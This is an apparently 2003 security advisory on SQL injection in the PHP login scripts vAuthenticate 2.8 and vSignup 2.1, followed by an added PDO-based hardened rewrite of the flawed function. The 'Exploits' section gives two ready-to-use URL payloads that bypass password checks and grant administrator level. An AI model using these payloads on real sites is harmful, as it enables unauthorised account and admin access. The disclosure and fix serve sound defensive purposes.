From: Frog Man (leseulfrog_at_hotmail.com)
Date: Tue Jan 14 2003 - 10:38:58 CST


    Information :
    °°°°°°°°°°°°°
    -----------------------
    Product : vAuthenticate
    Version : 2.8
    -----------------------
    Product : vSignup
    Version : 2.1
    -----------------------
    Website : http://www.beanbug.net
    Problem : SQL Injection

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    chgpwd.php :
    -----------------------------------------------
    <?
            if (!class_exists(auth))
            {
                    include ("auth.php");
            }
                    include ("authconfig.php");
                    include ("check.php");
    ?>
    -----------------------------------------------

    admin/index.php :
    ------------------------------------------
    <?
            if (!class_exists(auth))
            {
                    include ("../auth.php");
            }
                    include ("../authconfig.php");
                    include ("../check.php");

            if ($check["level"] != 1)
            {
    ------------------------------------------

    check.php :
    ------------------------------------------------------------------------
    <?
            $CheckSecurity = new auth();
            $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
            if ($check == false)
            {
                    // Feel free to change the error message below. Just make sure you put a "\" before
                    // any double quote.
                    print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF0000\">";
                    print "<b>Illegal Access</b>";
                    print "</font><br>";
                    print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#000000\">";
                    print "<b>You do not have permission to view this page.</b></font>";

                    exit; // End program execution. This will disable continuation of processing the rest of the page.
            }

    ?>
    ------------------------------------------------------------------------

    auth.php :
    ------------------------------------------------------------------------
    function page_check($username, $password) {
            $query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
            $connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);

            // OLD CODE - DO NOT REMOVE
            // $result = mysql_db_query($this->DBNAME, $query);

            // REVISED CODE
            $SelectedDB = mysql_select_db($this->DBNAME);
            $result = mysql_query($query);

            $numrows = mysql_num_rows($result);
            $row = mysql_fetch_array($result);

            // CHECK IF THERE ARE RESULTS
            // Logic: If the number of rows of the resulting recordset is 0, that means that no
            // match was found. Meaning, wrong username-password combination.
            if ($numrows == 0) {
                    return false;
            }
            else {
                    return $row;
            }
    } // End: function page_check
    ------------------------------------------------------------------------

    Exploits :
    °°°°°°°°°°
    http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='

    http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1

    Patches :
    °°°°°°°°°
    A patch can be found on http://www.phpsecure.org.

    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/vAuth-Signup.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

    frog-mn
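The root cause shown in the post is that page_check() in auth.php interpolates $username and $password directly into the SQL text, and those values arrive straight from the request (the exploit URLs pass them as USERNAME and PASSWORD query parameters, picked up by PHP's register_globals), so a quote character in either value changes the WHERE clause rather than being matched as data. The block below is an added example written for this page; it is neither code from the advisory nor the vendor's patch from phpsecure.org. It rewrites page_check() with a PDO prepared statement, keeps the advisory's table and column names (authuser, uname, passwd, status, level), and assumes, as an illustration, that passwd now stores password_hash() output instead of plaintext; the in-memory SQLite database and its two user rows are constructed sample data.

```php
<?php
// Added example, not code from the advisory or from vAuthenticate/vSignup.
// Hardened page_check(): the SQL text is fixed and the username travels as a
// bound parameter, so request values can no longer alter the query structure.
// Assumptions: passwd holds password_hash() output; SQLite is used for the demo.

class auth_hardened
{
    private PDO $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
    }

    // Original (vulnerable) shape from auth.php, kept here only as a reference:
    //   "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'"
    public function page_check(string $username, string $password)
    {
        // The driver sends SQL text and the value separately; no string building.
        $stmt = $this->db->prepare(
            "SELECT * FROM authuser WHERE uname = :uname AND status <> 'inactive'"
        );
        $stmt->execute([':uname' => $username]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);

        // No active row for that user: same outcome as the original's $numrows == 0 branch.
        if ($row === false) {
            return false;
        }

        // Assumption: passwd is a password_hash() string, so the secret comparison
        // happens in PHP with password_verify() rather than inside the SQL WHERE.
        if (!password_verify($password, $row['passwd'])) {
            return false;
        }
        unset($row['passwd']);
        return $row;
    }

    // The level check that admin/index.php performs, with a strict comparison
    // instead of PHP's loose != on a value that came from the database.
    public static function is_admin($check): bool
    {
        return is_array($check) && isset($check['level']) && (int) $check['level'] === 1;
    }
}

// Self-contained demo on an in-memory SQLite database (constructed sample rows).
function demo(): array
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $db->exec("CREATE TABLE authuser (uname TEXT, passwd TEXT, status TEXT, level INTEGER)");
    $ins = $db->prepare("INSERT INTO authuser VALUES (:u, :p, :s, :l)");
    $ins->execute([':u' => 'alice', ':p' => password_hash('correct horse', PASSWORD_DEFAULT), ':s' => 'active',   ':l' => 1]);
    $ins->execute([':u' => 'bob',   ':p' => password_hash('hunter2', PASSWORD_DEFAULT),       ':s' => 'inactive', ':l' => 2]);

    $auth = new auth_hardened($db);
    return [
        'valid_admin'   => auth_hardened::is_admin($auth->page_check('alice', 'correct horse')),
        'wrong_password' => $auth->page_check('alice', 'nope') === false,
        'inactive_user'  => $auth->page_check('bob', 'hunter2') === false,
        // The quote-based value from the advisory is now just a literal username
        // that matches no row, so the check fails instead of bypassing the login.
        'quoted_input'   => $auth->page_check("' OR ''='", "' OR ''='") === false,
    ];
}

// In the real scripts, read credentials from the request explicitly instead of
// relying on register_globals, which is how the original got $USERNAME/$PASSWORD:
// $check = (new auth_hardened($pdo))->page_check($_POST['USERNAME'] ?? '', $_POST['PASSWORD'] ?? '');
var_dump(demo());
```

Two design points worth noting. The password is deliberately left out of the WHERE clause: with a bound parameter it would be safe from injection either way, but hashing in the application lets the database hold no plaintext secrets, which the original schema did. And the admin check stays in PHP after page_check() returns, as in admin/index.php, but uses a strict integer comparison so that a string value pulled from the row cannot satisfy it through type juggling.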
